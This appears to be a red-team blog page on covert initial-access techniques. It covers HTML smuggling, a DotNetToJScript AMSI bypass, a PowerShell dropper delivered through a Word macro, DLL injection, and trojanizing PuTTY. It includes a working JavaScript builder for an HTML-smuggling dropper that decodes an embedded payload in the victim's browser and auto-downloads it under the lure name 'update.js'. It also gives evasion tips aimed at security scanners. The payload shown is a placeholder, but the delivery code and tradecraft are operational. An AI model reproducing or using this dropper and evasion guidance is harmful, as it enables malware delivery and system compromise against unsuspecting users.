HTML Smuggle with JavaScript
A great way to obtain an initial foothold during covert ops is HTML smuggling. The idea is to get the target user to open an HTML file. The page assembles our file of choice client-side with JavaScript and automatically downloads it; once run, that file connects back to our C2 channel.
I used msfvenom to create the payload in raw format, then fed this to SharpShooter, which converts the payload to JavaScript. I could have used DotNetToJScript to do this, but the SharpShooter route is much quicker. Keep in mind from an OPSEC perspective that SharpShooter output may well be signatured by today's security tools.
I base64 encode the JavaScript payload, then place the encoded text into a JavaScript Blob inside my dropper. The dropper has a base64 decoding routine embedded (base64 is encoding, not encryption, so it hides the payload from a casual look at the HTML and from attachment scanners keyed on file type, not from anyone who decodes it).
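The operator-side builder for such a dropper, as an added example that is not the author's own code from the video: it base64-encodes the payload, embeds it in an HTML page together with a dependency-free decoder, and the page reconstructs the bytes in a Blob and fires a download through a hidden anchor. The file name `update.js`, the MIME type, and the `PLACEHOLDER_PAYLOAD` (a harmless text file standing in for the msfvenom/SharpShooter JScript) are assumptions for illustration.

```javascript
// Added example for this page (not the author's dropper): operator-side builder
// for an HTML-smuggling page. The payload is embedded as base64 text, decoded in
// the browser by a self-contained routine, wrapped in a Blob and handed to an
// <a download> click. PLACEHOLDER_PAYLOAD is a constructed, harmless text file
// standing in for the msfvenom/SharpShooter JScript used in the video.
const B64_ALPHABET =
  "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

// Operator side: bytes -> base64. Kept symmetric with the decoder below so the
// round trip is easy to verify (Buffer would do the same job in Node).
function bytesToB64(bytes) {
  let out = "";
  for (let i = 0; i < bytes.length; i += 3) {
    const b0 = bytes[i], b1 = bytes[i + 1], b2 = bytes[i + 2];
    const n = (b0 << 16) | ((b1 || 0) << 8) | (b2 || 0);
    out += B64_ALPHABET[(n >> 18) & 63] + B64_ALPHABET[(n >> 12) & 63];
    out += b1 === undefined ? "=" : B64_ALPHABET[(n >> 6) & 63];
    out += b2 === undefined ? "=" : B64_ALPHABET[n & 63];
  }
  return out;
}

// Victim side: the decoder that gets embedded in the page. No dependencies, so
// it can be pasted verbatim into the dropper (atob() would also work; a
// hand-rolled loop is simply one less well-known string for a scanner to key on).
function b64ToBytes(b64) {
  const clean = b64.replace(/[^A-Za-z0-9+/]/g, "");
  const out = [];
  let acc = 0, bits = 0;
  for (const ch of clean) {
    acc = (acc << 6) | B64_ALPHABET.indexOf(ch);
    bits += 6;
    if (bits >= 8) {
      bits -= 8;
      out.push((acc >> bits) & 0xff);
      acc &= (1 << bits) - 1; // keep only the leftover low bits
    }
  }
  return new Uint8Array(out);
}

// Emit the dropper page. The payload only ever exists as a Blob inside the
// browser, so nothing on the wire looks like a .js/.exe attachment; the
// download is triggered by a synthetic click on a hidden anchor.
function buildDropperHtml(payloadBytes, filename, mime) {
  const b64 = bytesToB64(payloadBytes);
  return `<!doctype html>
<html><body>
<script>
const B64_ALPHABET = ${JSON.stringify(B64_ALPHABET)};
${b64ToBytes.toString()}
const bytes = b64ToBytes(${JSON.stringify(b64)});
const blob = new Blob([bytes], { type: ${JSON.stringify(mime)} });
const url = URL.createObjectURL(blob);
const a = document.createElement("a");
a.href = url;
a.download = ${JSON.stringify(filename)};
document.body.appendChild(a);
a.click();
URL.revokeObjectURL(url);
</script>
</body></html>`;
}

// Constructed placeholder payload (assumption); the video drops a SharpShooter
// JScript here instead.
const PLACEHOLDER_PAYLOAD = new TextEncoder().encode("harmless placeholder\r\n");

// Round-trip check: the bytes the victim's browser reconstructs must equal the
// bytes the operator embedded.
function roundTrip(bytes) {
  return Array.from(b64ToBytes(bytesToB64(bytes)));
}

if (typeof require !== "undefined" && require.main === module) {
  // Write the finished dropper to stdout: node dropper.js > update.html
  process.stdout.write(buildDropperHtml(PLACEHOLDER_PAYLOAD, "update.js", "text/javascript"));
}
```

The decoder is embedded via `b64ToBytes.toString()` so the same routine that is tested here is the one that runs in the victim's browser. Redirecting the output to an `.html` file gives the lure; the `roundTrip` helper is the check worth running before sending it, since a single corrupted byte in the embedded text means the dropped file never connects back.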
DotNetToJScript AMSI Bypass
DotNetToJScript is an excellent tool for getting .NET code past security controls. Earlier I showed the quicker route with SharpShooter, which is built in Python; these days, however, security tools have SharpShooter signatured, so it is not OPSEC friendly. In this scenario I generate the payload with msfvenom in C# format and paste that shellcode into the byte array of the code shown in the video. The code uses Win32 APIs from kernel32.dll (via P/Invoke) to allocate and map the memory the shellcode runs from. After compiling, we use DotNetToJScript.exe to convert the assembly into its weaponized format, a .js file.
Weaponizing a PowerShell Dropper for Delivery via Microsoft Word
In this video I demonstrate how I weaponized the PowerShell dropper and delivered it via a Microsoft Word macro using a PowerShell download cradle.
This is not OPSEC safe, because the PowerShell download cradle is signatured. However, you can be as creative as you like with the cradle.
PowerShell Dropper
PowerShell droppers are extremely useful when living off the land. I find that PowerShell reflection techniques that never touch disk work a treat: they give us the ability to invoke Win32 APIs from code that executes entirely in memory.
DLL Injection Technique with C
There are several injection techniques that can be OPSEC safe. The reason to implement an injection technique in your implant is to fly under the radar without getting caught. Remote process injection, DLL injection and process hollowing are all excellent choices.
The one I'll be completing today is DLL injection. Before anything else, we create a custom DLL with msfvenom. Then we import the required APIs using P/Invoke DllImport declarations taken from pinvoke.net (P/Invoke means the injector itself is C#; a plain C injector would call the same kernel32.dll APIs directly through the Windows headers).
PuTTY Trojan Backdoor
This is a custom technique for creating a backdoor by trojanizing an SSH client, in this case the PuTTY binary. Threat actors use this specific technique to hide malware inside a legitimate program. In this demonstration I used calc.exe as the payload; in real scenarios, malicious actors use a C2 implant as the payload to obtain a stable connection back to their command-and-control server. Is your organisation safeguarded against this technique?